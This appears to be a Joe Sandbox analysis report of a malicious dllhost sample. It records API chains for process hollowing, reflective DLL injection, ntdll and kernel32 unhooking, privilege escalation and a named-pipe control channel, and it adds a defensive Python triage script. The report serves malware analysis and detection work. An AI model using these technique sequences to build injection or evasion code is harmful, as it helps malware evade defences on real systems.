                                                                                                                                                          • Snapshot File: hcaresult_96_3_2add6230000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                          • String ID: csm$csm
                                                                                                                                                          • API String ID: 3896166516-3733052814
                                                                                                                                                          • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction ID: 3d13fda86842b367b8776a3ac6855868a785ddbdf276940a39d1c24ad52e8571
                                                                                                                                                          • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                                                                                                                                          • Instruction Fuzzy Hash: 7251913B724A408BEB749F119548358BBA0F367F94F14412AEE9A4BF95DF38C450CB82
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000060.00000003.2329431899.000002ADD6230000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ADD6230000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_96_3_2add6230000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                                                                                                          • String ID: csm
                                                                                                                                                          • API String ID: 3242871069-1018135373
                                                                                                                                                          • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction ID: 888f14a423208018aa102f3092026acbe36b110713a8b5ed772918e463367abd
                                                                                                                                                          • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                                                                                                                                          • Instruction Fuzzy Hash: 3F51BE3B321E408BDB54CB95D508B28BBA1F346F88F1581299A974FF88DB78C841C781
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000060.00000003.2329431899.000002ADD6230000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002ADD6230000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_96_3_2add6230000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CallTranslator
                                                                                                                                                          • String ID: MOC$RCC
                                                                                                                                                          • API String ID: 3163161869-2084237596
                                                                                                                                                          • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction ID: 442ee0d98aca26e17738369c11726853440d8e7f30a2f565789146e8bc88474b
                                                                                                                                                          • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                                                                                                                                          • Instruction Fuzzy Hash: 03619E37A24BC482DB709F15E44539AFBA0F796B88F044219EB9A0BB95DF78D190CB41

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:14.2%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                          Total number of Nodes:217
                                                                                                                                                          Total number of Limit Nodes:12
execution_graph (the graph widget's raw node/edge dump, reduced to the per-function API chains it records; "N API calls" nodes are call sites into another function and are written here as "call <addr>"; where a function branches, blocks are listed in address order, which is code layout, not execution order):
• 1400031c4: call 140001868
• 140001868 (31 API calls): OpenProcess, IsWow64Process, CloseHandle, OpenProcess, OpenProcess, K32GetModuleFileNameExW, PathFindFileNameW, lstrlenW, StrCpyW, CloseHandle, StrCmpIW, NtQueryInformationProcess, OpenProcessToken, GetTokenInformation, GetLastError, LocalAlloc, GetTokenInformation, GetSidSubAuthorityCount, GetSidSubAuthority, LocalFree, CloseHandle, StrStrA, VirtualAllocEx, WriteProcessMemory, call 140002bfc, CloseHandle
• 140002bfc → 1400020cc: GetModuleHandleA, GetProcAddress
• 140003204 (dispatcher, many branches): ReadFile; call 140001868; RegOpenKeyExW, RegDeleteValueW ×3; call 14000217c; call 140001f7c; ExitProcess; GetProcessHeap, HeapAlloc, K32EnumProcesses; call 140001868; call 140002c5c (→ 1400020cc GetModuleHandleA, GetProcAddress); call 1400020fc; ReadFile; GetProcessHeap, HeapAlloc, ReadFile; call 140002434; call 1400020fc; ShellExecuteW; call 140001f7c; ReadFile; GetProcessHeap, HeapAlloc; call 140001cf0; call 140001eec; GetProcessHeap, HeapFree
• 14000217c: SysAllocString ×2, CoInitializeEx, CoInitializeSecurity, CoCreateInstance, VariantInit, CoUninitialize, SysFreeString ×2
• 140001f7c: GetProcessHeap, HeapAlloc, call 140001cf0, loop { call 140001eec }, GetProcessHeap, HeapFree
• 1400020fc: loop { ReadFile }
• 140002434: CreateProcessW; GetModuleHandleA, GetProcAddress; VirtualAllocEx, WriteProcessMemory, VirtualProtectEx (two copies of this triple, at 140002566 and 14000273f); VirtualAlloc, GetThreadContext, WriteProcessMemory, SetThreadContext, ResumeThread (140002682 to 140002712); VirtualAlloc, Wow64GetThreadContext, WriteProcessMemory, Wow64SetThreadContext (140002858 to 1400028b6); further VirtualProtectEx and WriteProcessMemory blocks; failure path OpenProcess, TerminateProcess (1400028e1)
• 140001eec: OpenProcess, call 140002bfc, CloseHandle
• 140002d38: call 140002d4c, ExitProcess
• 140002d4c: loop { OpenMutexW, Sleep }, CloseHandle, call 140002a0c ×2, GetCurrentProcessId, OpenProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, GetLastError, CloseHandle, RegOpenKeyExW, RegQueryValueExW ×2, GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc, RegQueryValueExW ×2, RegCloseKey, GetCurrentProcessId, call 14000200c (the remainder of this function is in the control-flow graph below)
• 140002a0c: StrCpyW, StrCatW, GetModuleHandleW, GetCurrentProcess, K32GetModuleInformation, CreateFileW, CreateFileMappingW, MapViewOfFile, loop { lstrcmpiA }, VirtualProtect ×2, CloseHandle ×2, FreeLibrary
• 14000200c: GetProcessHeap, HeapAlloc, call 140001cf0, loop { OpenProcess, TerminateProcess, CloseHandle }, GetProcessHeap, HeapFree
• 140001cf0: GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc, K32EnumProcesses, loop { OpenProcess, K32EnumProcessModulesEx, ReadProcessMemory, CloseHandle }, GetProcessHeap, HeapFree, GetProcessHeap, HeapFree
• 140003728: call 140002300; loop { ConnectNamedPipe, Sleep, ReadFile, WriteFile, DisconnectNamedPipe }
• 140002300: AllocateAndInitializeSid, SetEntriesInAclW, LocalAlloc, InitializeSecurityDescriptor, SetSecurityDescriptorDacl, CreateNamedPipeW
• 140003668: GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc; loop { K32EnumProcesses, Sleep }
• 140002cb0: call 140002300; loop { Sleep, ConnectNamedPipe, ReadFile, DisconnectNamedPipe }
What these chains support, without going beyond the graph: 140002434 is the CreateProcessW → VirtualAllocEx/WriteProcessMemory → Get/SetThreadContext → ResumeThread sequence of process hollowing, with Wow64 variants for a 32-bit target started from this 64-bit module. 140002a0c maps a file from disk with CreateFileMappingW/MapViewOfFile, compares section names with lstrcmpiA (its strings are ".text" and "C:\Windows\System32\") and then calls VirtualProtect twice on the loaded module; it is called twice from 140002d4c, whose strings include ntdll.dll and kernel32.dll, which is consistent with restoring the clean .text of those DLLs to strip user-mode hooks. 140002d4c enables a privilege (SeDebugPrivilege appears in its strings) on its own token before reading SOFTWARE\$rbx-config. 140002300 builds an explicit DACL before CreateNamedPipeW, so the pipe is reachable by whatever SIDs that DACL names, not only the creator. 140001868 opens a target process, checks its bitness, image name and token SIDs, and writes into it; what is written is not visible in the graph.
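The execution_graph listing above is a flat node/edge dump, and the behaviours the report flags (process hollowing, module remapping, an ACL'd named pipe) are only visible once the nodes are regrouped into functions. The following is an added example by the editor, not code from the Joe Sandbox report nor from the sample: a parser for that dump format plus a set-based matcher that labels each function by the APIs reachable from its entry block. The embedded input is three functions (140002434, 140002a0c, 140002300) transcribed from the listing; the pattern names and the minimal API steps per pattern are the editor's own choices, and the matcher deliberately ignores order because a basic-block graph does not record the order in which APIs executed.

```python
import re
from collections import defaultdict, deque
from dataclasses import dataclass, field

ADDR_RE = re.compile(r"[0-9a-f]{8,16}")   # code addresses such as 1400024d7
EDGE_RE = re.compile(r"(\d+)->(\d+)")     # "src->dst" node ids

# Behavioural patterns as required API steps; each step is a set of alternatives
# (the Wow64* variants cover a 32-bit target driven from a 64-bit process).
# Set-based on purpose: the graph records blocks and edges, not an ordered trace.
PATTERNS = {
    "process_hollowing": [
        {"CreateProcessW"}, {"VirtualAllocEx"}, {"WriteProcessMemory"},
        {"SetThreadContext", "Wow64SetThreadContext"}, {"ResumeThread"},
    ],
    "module_remap_unhook": [
        {"CreateFileW"}, {"CreateFileMappingW"}, {"MapViewOfFile"}, {"VirtualProtect"},
    ],
    "dacl_named_pipe": [
        {"SetEntriesInAclW"}, {"SetSecurityDescriptorDacl"}, {"CreateNamedPipeW"},
    ],
}

# Constructed input: three functions copied verbatim from the report's execution_graph.
# Edges that leave the excerpt (e.g. "766->711", a return to the caller) are ignored.
GRAPH_EXCERPT = """
741 140002434 742 14000246f 741->742 766 140002726 741->766 744 1400020cc 2 API calls 742->744
765 1400024ae 742->765 742->766 743 1400024d7 CreateProcessW 743->765 744->765 745 1400028e1 OpenProcess
746 1400028f1 TerminateProcess 745->746 745->765 746->765 747 1400020cc GetModuleHandleA GetProcAddress
747->765 748 140002566 VirtualAllocEx 750 140002595 WriteProcessMemory 748->750 748->765
749 14000273f VirtualAllocEx 751 14000276d WriteProcessMemory 749->751 749->765 752 1400025b7 VirtualProtectEx
750->752 750->765 753 14000278f VirtualProtectEx 751->753 751->765 752->765 753->765 754 140002858 VirtualAlloc
758 140002879 Wow64GetThreadContext 754->758 754->765 755 140002682 VirtualAlloc 757 1400026a7 GetThreadContext
755->757 755->765 756 1400027d0 WriteProcessMemory 756->765 760 1400026c4 WriteProcessMemory 757->760 757->765
761 140002891 WriteProcessMemory 758->761 758->765 759 1400025f9 WriteProcessMemory 759->765
762 1400026ef SetThreadContext 760->762 760->765 763 1400028b6 Wow64SetThreadContext 761->763 761->765
764 140002712 ResumeThread 762->764 762->765 763->765 764->765 764->766 765->743 765->745 765->747 765->748
765->749 765->754 765->755 765->756 765->759 765->766 767 140002643 VirtualProtectEx 765->767
768 14000281a VirtualProtectEx 765->768 766->711 767->765 768->765
580 140002a0c 581 140002a15 StrCpyW StrCatW GetModuleHandleW 580->581 582 140002bdf 580->582 581->582
583 140002a66 GetCurrentProcess K32GetModuleInformation 581->583 582->538 584 140002bd6 FreeLibrary 583->584
585 140002a96 CreateFileW 583->585 584->582 585->584 586 140002acb CreateFileMappingW 585->586
587 140002af4 MapViewOfFile 586->587 588 140002bcd CloseHandle 586->588 589 140002bc4 CloseHandle 587->589
590 140002b17 587->590 588->584 589->588 590->589 591 140002b30 lstrcmpiA 590->591 593 140002b6e 590->593
591->590 592 140002b70 VirtualProtect VirtualProtect 591->592 592->589 593->589
787 140002300 AllocateAndInitializeSid 788 14000241b 787->788 789 14000235d SetEntriesInAclW 787->789 788->778
789->788 790 1400023a1 LocalAlloc 789->790 790->788 791 1400023b5 InitializeSecurityDescriptor 790->791 791->788
792 1400023c5 SetSecurityDescriptorDacl 791->792 792->788 793 1400023dc CreateNamedPipeW 792->793 793->788
"""


@dataclass
class Node:
    nid: str
    addr: str
    apis: list = field(default_factory=list)
    callee: str = ""   # set on "N API calls" nodes, i.e. a call site into another function


def parse_graph(text):
    """Parse execution_graph text into ({node id: Node}, {node id: [successor ids]})."""
    nodes, succ = {}, defaultdict(list)
    toks = text.split()
    cur, i = None, 0
    while i < len(toks):
        tok = toks[i]
        edge = EDGE_RE.fullmatch(tok)
        if edge:                                                   # "src->dst"
            succ[edge.group(1)].append(edge.group(2))
            i += 1
        elif tok.isdigit() and i + 1 < len(toks) and ADDR_RE.fullmatch(toks[i + 1]):
            cur = nodes[tok] = Node(tok, toks[i + 1])              # "<id> <address>" opens a node
            i += 2
        elif tok.isdigit() and toks[i + 1:i + 3] == ["API", "calls"]:
            cur.callee = cur.addr                                  # "<n> API calls": call-site node
            i += 3
        else:
            cur.apis.append(tok)                                   # anything else is an API name
            i += 1
    return nodes, succ


def functions(nodes, succ):
    """One function per root node (no incoming edge): the APIs of every block reachable from it."""
    targets = {dst for outs in succ.values() for dst in outs}
    result = {}
    for root in (n for n in nodes if n not in targets):
        seen, queue, apis = {root}, deque([root]), []
        while queue:
            n = queue.popleft()
            apis.extend(nodes[n].apis)
            for dst in succ[n]:
                if dst in nodes and dst not in seen:               # drop edges leaving the excerpt
                    seen.add(dst)
                    queue.append(dst)
        result[nodes[root].addr] = apis
    return result


def classify(apis):
    """Names of every pattern whose steps are all satisfied by the function's API set."""
    present = set(apis)
    return sorted(name for name, steps in PATTERNS.items() if all(present & step for step in steps))


def analyze(text):
    nodes, succ = parse_graph(text)
    return {addr: classify(apis) for addr, apis in functions(nodes, succ).items()}


if __name__ == "__main__":
    for addr, hits in analyze(GRAPH_EXCERPT).items():
        print(f"sub_{addr}: {', '.join(hits) or 'no pattern'}")
```

Two design points. Roots are found as "nodes with no incoming edge", which works only because the excerpt contains whole functions; on the full dump the call-site nodes ("N API calls") would need to be used as function boundaries instead. The set-based match is intentionally loose: a legitimate debugger or loader can also touch CreateProcessW, WriteProcessMemory and SetThreadContext, so a hit here is a triage label for a function worth reading, not a verdict.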

                                                                                                                                                          Control-flow Graph

control_flow_graph for 140002d4c (graph widget data reduced to "block range: APIs → successors"; "|" separates the two branch targets, "exit" is the common return block 1400031b3-1400031c1):
• 140002d4c-140002d5c → 140002d5e
• 140002d5e-140002d75: OpenMutexW → 140002d84 | 140002d77
• 140002d77-140002d82: Sleep → 140002d5e (retry loop)
• 140002d84-140002dc1: CloseHandle, call 140002a0c ×2, GetCurrentProcessId, OpenProcess → 140002dc3 | 140002e39
• 140002dc3-140002dd7: OpenProcessToken → 140002dd9 | 140002e30
• 140002dd9-140002dee: LookupPrivilegeValueW → 140002df0 | 140002e30
• 140002df0-140002e28: AdjustTokenPrivileges → 140002e2a | 140002e30
• 140002e2a: GetLastError → 140002e30
• 140002e30-140002e33: CloseHandle → 140002e39
• 140002e39-140002e64: RegOpenKeyExW → 140002e6a | exit
• 140002e6a-140002e94: RegQueryValueExW → 140002e9a | exit
• 140002e9a-140002ec4: RegQueryValueExW → 140002eca | exit
• 140002eca-140002f36: GetProcessHeap, HeapAlloc, GetProcessHeap, HeapAlloc, RegQueryValueExW → 140002f3c | exit
• 140002f3c-140002f66: RegQueryValueExW → 140002f6c | exit
• 140002f6c-140002f7e: RegCloseKey, GetCurrentProcessId, call 14000200c → 140002f83
• 140002f83-140002fba: RegCreateKeyExW → 140002fc0 | 14000307d
• 140002fc0-140002fe6: ConvertStringSecurityDescriptorToSecurityDescriptorW → 140002fe8 | 140003002
• 140002fe8-140002ffc: RegSetKeySecurity, LocalFree → 140003002
• 140003002-14000303a: RegCreateKeyExW → 14000303c | 140003073
• 14000303c-14000306d: GetCurrentProcessId, RegSetValueExW, RegCloseKey → 140003073
• 140003073-140003077: RegCloseKey → 14000307d
• 14000307d-140003111: CreateThread, GetProcessHeap, HeapAlloc, CreateThread ×2, call 14000151c → 140003113 | 140003145
• 140003113-140003143: ShellExecuteW → 140003113 (loop) | 140003145
• 140003145-1400031ad: call 14000148c, call 1400011d4, call 14000148c ×3, call 1400011d4 ×3, GetProcessHeap, HeapFree, Sleep → exit
• 1400031b3-1400031c1: exit
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Heap$CloseValue$CreateOpen$AllocQuery$CurrentHandleSecurityThread$DescriptorFreeSleepToken$AdjustConvertErrorExecuteLastLocalLookupMutexPrivilegePrivilegesShellStringTerminate
                                                                                                                                                          • String ID: $rbx-dll32$$rbx-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$Global\Onimai_3637bd27-1800-4db6-94b5-e49ce9967b2d$SOFTWARE$SOFTWARE\$rbx-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                                                                                                                                          • API String ID: 2725631067-1382791509
                                                                                                                                                          • Opcode ID: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                                                                                                                                          • Instruction ID: 11cca5996524c372b97bd826982d2baaf99c89fd62df68e9b01c6f7d22bdc91e
                                                                                                                                                          • Opcode Fuzzy Hash: 19d6d12776ca0f2fbbe8990d885d79cc61f5dade11bb5855dcfccad145e38bad
                                                                                                                                                          • Instruction Fuzzy Hash: 8DD1E0F6600A4086EB26DF22F8547DA27A5FB8CBD9F404116FB4A43A79DF38C589C744

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4084875642-0
                                                                                                                                                          • Opcode ID: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                                                                                                                                          • Instruction ID: 4f27d05859a20aa5d5a2c4d21673197ed0af44fd7722cf910b4e92e6674c13e6
                                                                                                                                                          • Opcode Fuzzy Hash: 99f1e0b8495db7c7422e5633d2a2a6cdcfefacb08c3e4568b061437f40fd1713
                                                                                                                                                          • Instruction Fuzzy Hash: AB5159B27116808AEB66DF63F8587EA22A1B78DBC4F844025EF5957764DF38C585C600

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                                                                                                                          • String ID: .text$C:\Windows\System32\
                                                                                                                                                          • API String ID: 2721474350-832442975
                                                                                                                                                          • Opcode ID: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                                                                                                                                          • Instruction ID: a18771497a2cdddd7f649ca88061091fbee7acde65ae68025fcc699bdcbe0bdc
                                                                                                                                                          • Opcode Fuzzy Hash: 67dc4a1953bc74d66d77374d22a158681d99b3099cd4d4745ab806a1cba25056
                                                                                                                                                          • Instruction Fuzzy Hash: 89517BB270468086EB62DF16F9587DA73A1FB8CBD5F444525AF4A03BA8DF38C558C704

                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1323846700-0
                                                                                                                                                          • Opcode ID: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                                                                                                                          • Instruction ID: 9fe7bf929bc7bac8d1627b31ede7e1d2709182ad911688bdebd710bde7565a1c
                                                                                                                                                          • Opcode Fuzzy Hash: 129a76087fcf8d85bc51ac130c76dfd69e86b58b274f62a94307b14953ecb4ac
                                                                                                                                                          • Instruction Fuzzy Hash: 78115EB1B0564086FB16DF27F84439A67A1AB8DBD4F488028FF0903776EE39C586C704

                                                                                                                                                          Control-flow Graph

control_flow_graph for 140002d38 (entry stub; "block range: APIs → successor"):
• 140002d38-140002d3c: call 140002d4c → 140002d41
• 140002d41-140002d43: ExitProcess
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenMutexW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D6C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D7C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002D87
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DA5
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DB5
                                                                                                                                                            • Part of subcall function 0000000140002D4C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002DCF
                                                                                                                                                            • Part of subcall function 0000000140002D4C: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DE6
                                                                                                                                                            • Part of subcall function 0000000140002D4C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002E20
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetLastError.KERNEL32 ref: 0000000140002E2A
                                                                                                                                                            • Part of subcall function 0000000140002D4C: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E33
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E5C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002E8C
                                                                                                                                                            • Part of subcall function 0000000140002D4C: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EBC
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002ED0
                                                                                                                                                            • Part of subcall function 0000000140002D4C: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EDE
                                                                                                                                                            • Part of subcall function 0000000140002D4C: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D41), ref: 0000000140002EF1
                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0000000140002D43
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
• Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
• Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$Open$HeapValue$CloseHandleQueryToken$AdjustAllocCurrentErrorExitLastLookupMutexPrivilegePrivilegesSleep
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3805535264-0
                                                                                                                                                          • Opcode ID: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                                                                                                                          • Instruction ID: 466ff6e6ce30b805044d1f2dc35dca8baccd3c328fc793c3ea1e6e53ebee4899
                                                                                                                                                          • Opcode Fuzzy Hash: 79b4bc089e26725b3875790e3276540c07806726462858758fa47b4ded48d988
                                                                                                                                                          • Instruction Fuzzy Hash: 15A002F0F2258083EB0AB7B7B85A3DD25B1ABAC781F100416B2024B2B3DE3C48954759

                                                                                                                                                          Control-flow Graph

                                                                                                                                                          control_flow_graph 95 140001868-1400018aa OpenProcess 96 140001cd1-140001ced 95->96 97 1400018b0-1400018c5 IsWow64Process 95->97 98 1400018d5 97->98 99 1400018c7-1400018d3 97->99 100 1400018db-1400018e7 CloseHandle 98->100 99->100 100->96 101 1400018ed-1400018f8 100->101 101->96 102 1400018fe-140001913 101->102 103 140001925 102->103 104 140001915-14000191a 102->104 106 140001927-140001929 103->106 104->96 105 140001920-140001923 104->105 105->106 106->96 107 14000192f-140001945 OpenProcess 106->107 107->96 108 14000194b-140001964 OpenProcess 107->108 109 140001a04-140001a23 NtQueryInformationProcess 108->109 110 14000196a-140001981 K32GetModuleFileNameExW 108->110 113 140001cc8-140001ccb CloseHandle 109->113 114 140001a29-140001a2d 109->114 111 1400019b3-1400019bf CloseHandle 110->111 112 140001983-14000199e PathFindFileNameW lstrlenW 110->112 111->109 116 1400019c1-1400019db 111->116 112->111 115 1400019a0-1400019b0 StrCpyW 112->115 113->96 114->113 117 140001a33-140001a4b OpenProcessToken 114->117 115->111 118 1400019e0-1400019f2 StrCmpIW 116->118 117->113 119 140001a51-140001a77 GetTokenInformation 117->119 118->113 120 1400019f8-140001a02 118->120 121 140001af4 119->121 122 140001a79-140001a82 GetLastError 119->122 120->109 120->118 123 140001afb-140001b09 CloseHandle 121->123 122->121 124 140001a84-140001a98 LocalAlloc 122->124 123->113 125 140001b0f-140001b16 123->125 124->121 126 140001a9a-140001ac0 GetTokenInformation 124->126 125->113 127 140001b1c-140001b27 125->127 128 140001ae2 126->128 129 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 126->129 127->113 130 140001b2d-140001b37 127->130 131 140001ae9-140001af2 LocalFree 128->131 129->131 132 140001b52 130->132 133 140001b39-140001b43 130->133 131->123 135 140001b56-140001b8e call 1400029a4 * 3 132->135 133->113 134 140001b49-140001b50 133->134 134->135 135->113 142 140001b94-140001bb4 call 1400029a4 StrStrA 135->142 145 140001bb6-140001bc6 142->145 146 140001bcd-140001bf2 call 1400029a4 * 2 142->146 145->142 147 140001bc8 145->147 146->113 152 140001bf8-140001c21 VirtualAllocEx 146->152 147->113 152->113 153 140001c27-140001c40 WriteProcessMemory 152->153 153->113 154 140001c46-140001c68 call 140002bfc 153->154 154->113 157 140001c6a-140001c72 154->157 157->113 158 140001c74-140001c81 WaitForSingleObject 157->158 159 140001c83-140001c97 GetExitCodeThread 158->159 160 140001cbd-140001cc2 CloseHandle 158->160 161 140001ca2-140001cbb VirtualFreeEx 159->161 162 140001c99-140001c9f 159->162 160->113 161->160 162->161
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000061.00000002.2212920043.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                          • Associated: 00000061.00000002.2212666939.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 00000061.00000002.2213103790.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          • Associated: 00000061.00000002.2213337110.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_97_2_140000000_dllhost.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                                                                                                                                          • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                                                                                                                                          • API String ID: 2456419452-2628171563
